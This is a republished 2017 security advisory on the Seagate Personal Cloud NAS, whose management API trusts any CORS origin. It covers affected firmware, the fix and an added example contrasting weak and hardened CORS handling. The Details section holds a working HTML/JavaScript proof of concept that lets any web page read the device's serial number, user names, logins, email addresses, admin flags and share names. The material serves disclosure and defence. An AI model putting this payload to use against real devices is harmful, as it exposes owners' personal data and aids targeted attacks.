Seagate Personal Cloud Information Disclosure
Source: nl.linkedin.com/in/yorickkoster  Author: Koster  Published: 2018-09-13
------------------------------------------------------------------------
Seagate Personal Cloud multiple information disclosure vulnerabilities
------------------------------------------------------------------------
Yorick Koster, September 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Seagate Personal Cloud is a consumer-grade Network-Attached Storage
device (NAS). It was found that the web application used to manage the
NAS is affected by various unauthenticated information disclosure
vulnerabilities. The device is configured to trust any CORS origin, and
is accessible via the personalcloud.local domain name. Due to this it is
possible for any website to gain access to this information. While this
information doesn't allow an attacker to compromise the NAS, the
information can be used to stage more targeted attacks.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was tested on a Seagate Personal Cloud model SRN21C running
firmware versions 4.3.16.0 and 4.3.18.0. The software is licensed from
LACIE; it is very likely that other devices/models are also affected.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
These issues have been mitigated in firmware version 4.3.19.3. The NAS
no longer accepts CORS requests from arbitrary sites. A number of
endpoints now require the user to be logged in.
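
The two changes described in the fix, modelled as an added example (this is not Seagate's or the advisory author's code). The handler names, the request object shape and the single allowed origin are assumptions; the endpoint paths are the ones used in the proof of concept. Because the proof of concept sends a plain POST with a string body, the browser issues no preflight, so the server processes the request either way and only the response headers and the login check decide what the calling page learns.

```javascript
// Added example; handleWeak/handleHardened/pageCanRead are hypothetical names.
// Assumption: the management UI's own origin is the only trusted origin.
const ALLOWED_ORIGINS = new Set(['http://personalcloud.local']);

// Endpoints from the proof of concept, treated here as requiring a login.
const PROTECTED = [
  '/api/external/8.0/system.System.get_infos',
  '/api/external/8.0/simple_sharing.SimpleSharing.list_users',
  '/api/external/8.0/nas_authentication.NasAuth.myShares',
];

// Weak setting: reflect whatever Origin the browser sent, no login check.
function handleWeak(req) {
  const headers = {};
  if (req.origin) headers['Access-Control-Allow-Origin'] = req.origin;
  return { status: 200, headers, bodySent: true };
}

// Corrected setting: exact-match origin allowlist plus an authentication gate.
function handleHardened(req) {
  const headers = { Vary: 'Origin' }; // caches must not reuse per-origin replies
  if (req.origin && ALLOWED_ORIGINS.has(req.origin)) {
    headers['Access-Control-Allow-Origin'] = req.origin;
  }
  if (PROTECTED.includes(req.path) && !req.sessionValid) {
    return { status: 401, headers, bodySent: false };
  }
  return { status: 200, headers, bodySent: true };
}

// What the browser lets the calling page do with a cross-origin response.
function pageCanRead(req, res) {
  const acao = res.headers['Access-Control-Allow-Origin'];
  return res.bodySent && (acao === '*' || acao === req.origin);
}

// Constructed sample requests (not captured traffic).
const untrusted = { origin: 'http://untrusted.example', path: PROTECTED[1], sessionValid: false };
const ownUi = { origin: 'http://personalcloud.local', path: PROTECTED[1], sessionValid: true };

function report() {
  return [handleWeak, handleHardened].map((h) => ({
    handler: h.name,
    untrustedReadable: pageCanRead(untrusted, h(untrusted)),
    ownUiReadable: pageCanRead(ownUi, h(ownUi)),
  }));
}
console.log(report());
```

The allowlist alone only stops a foreign page from reading the reply; the login requirement is what keeps the data out of the response when the caller is not a browser.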

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2017/seagate-personal-cloud-multiple-information-disclosure-vulnerabilities.html

Proof of concept:

<!DOCTYPE html>
<html>
<!-- Get version information -->
<script type="text/javascript">
fetch('http://personalcloud.local/api/external/8.0/system.System.get_infos',
   {method: 'POST', body: '{}'})
   .then(function(response) {
      response.json().then(function(data){
         if(data.hasOwnProperty('infos') && data['infos'].hasOwnProperty('__properties__')) {
            props = data['infos']['__properties__'];
            vendor = props['vendor_name'];
            product = props['product'];
            version = props['version'];
            serial_number = props['serial_number'];
            console.log(vendor + ' ' + product + ' ' + version + ' (serial: ' + serial_number + ')');
         }
      });
   })
   .catch(function(err) {
      console.log('Error :', err);
   });
</script>
   
<!-- Get users -->
<script type="text/javascript">
fetch('http://personalcloud.local/api/external/8.0/simple_sharing.SimpleSharing.list_users',
   {method: 'POST', body: '{"list_info":{"__type__":"ListInfo", "__version__":0, "__sub_version__":0, "__properties__":{"limit":-1, "offset":0, "search_parameters":{"__type__":"Dict", "__sub_type__":"Unicode", "__elements__":{}}}}, "with_parameters":{"__type__":"List","__sub_type__":"Unicode","__elements__":{}}} '})
   .then(function(response) {
      response.json().then(function(data){
         if(data.hasOwnProperty('user_list') && data['user_list'].hasOwnProperty('__elements__')) {
            console.log('Users:');
            data['user_list']['__elements__'].forEach(function(user) {
               if(user.hasOwnProperty('__properties__')) {
                  props = user['__properties__'];
                  firstname = props['firstname'];
                  lastname = props['lastname'];
                  login = props['login'];
                  email = props['email'];
                  is_admin = props['is_admin'];
                  is_enabled = props['is_enabled'];
                  console.log(firstname + ' ' + lastname + ' / ' + login + ' / ' + email +
                     ' / admin: ' + is_admin + ' / enabled: ' + is_enabled);
               }
            });
         }
      });
   })
   .catch(function(err) {
      console.log('Error :', err);
   });
</script>
   
<!-- Get shares -->
<script type="text/javascript">
fetch('http://personalcloud.local/api/external/8.0/nas_authentication.NasAuth.myShares',
   {method: 'POST', body: '{"list_info":{"__type__":"ListInfo", "__version__":0, "__sub_version__":0, "__properties__":{"limit":-1, "offset":0, "search_parameters":{"__type__":"Dict", "__sub_type__":"Unicode", "__elements__":{"name":""}}, "order":{"__type__":"Ordering", "__version__":0, "__sub_version__":0, "__properties__":{"asc":false, "order_by":"name"}}}}}'})
   .then(function(response) {
      response.json().then(function(data){
         if(data.hasOwnProperty('share_through_list') && data['share_through_list'].hasOwnProperty('__elements__')) {
            console.log('Shares:');
            data['share_through_list']['__elements__'].forEach(function(share) {
               if(share.hasOwnProperty('__properties__')) {
                  props = share['__properties__'];
                  console.log(props['share']['__properties__']['name']);
               }
            });
         }
      });
   })
   .catch(function(err) {
      console.log('Error :', err);
   });
</script>
</html>



 